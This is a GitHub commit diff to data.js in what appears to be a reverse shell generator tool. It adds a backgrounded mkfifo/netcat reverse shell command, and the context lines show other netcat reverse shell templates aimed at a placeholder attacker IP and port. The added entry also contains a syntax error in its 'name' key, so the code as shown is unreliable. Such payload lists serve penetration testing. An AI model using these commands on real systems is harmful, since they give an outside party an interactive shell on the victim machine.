Update data.js

Added mkfifo backgrounded
This commit is contained in:
Ryan Montgomery 2022-06-06 11:55:35 -04:00 committed by GitHub
parent ae0e3e49eb
commit 2b4821d0e6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -50,6 +50,11 @@ const reverseShellCommands = withCommandType(
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
"meta": ["linux", "mac"]
},
{
"name:" "mkfifo background",
"command": "(mkfifo \/tmp\/MmE1M; nc {ip} {port} 0<\/tmp\/MmE1M | {shell} >\/tmp\/MmE1M 2>&1; rm \/tmp\/MmE1M) &",
"meta": ["linux", "mac"]
},
{
"name": "nc -e",
"command": "nc -e {shell} {ip} {port}",